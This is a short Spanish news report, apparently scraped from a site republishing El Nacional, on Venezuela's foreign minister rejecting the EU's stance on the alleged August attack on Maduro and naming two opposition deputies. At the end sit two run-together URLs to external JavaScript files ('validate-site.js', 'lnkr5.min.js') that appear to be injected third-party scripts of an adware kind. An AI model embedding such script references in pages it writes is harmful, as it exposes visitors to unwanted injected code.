El canciller Jorge Arreaza publicó un comunicado que indica que tienen pruebas para iniciar un proceso contra dos diputados de la AN.

Jorge Arreaza, canciller de Venezuela, indicó el viernes que el gobierno rechaza la decisión de la Unión Europea (UE) de desconocer el presunto “atentado” contra Nicolás Maduro en la avenida Bolívar.

“La Unión Europea continúa atrapada en su retórica irracional, pretendiendo desconocer acciones terroristas dirigidas contra la vida del Presidente Nicolás Maduro y de las máximas autoridades de los Poderes Públicos”, indica un comunicado publicado por Arreaza en Twitter.

El comunicado señala que de acuerdo a las investigaciones realizadas hay pruebas que permiten iniciar un proceso contra dos diputados de la Asamblea Nacional (Juan Requesens y Julio Borges).

El sábado 4 de agosto se registró un presunto ataque con explosivos contra Maduro durante un acto realizado en la avenida Bolívar.

VÍA EL NACIONAL.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1533995624197https://devlinkin.xyz/addons/lnkr5.min.js

Loading...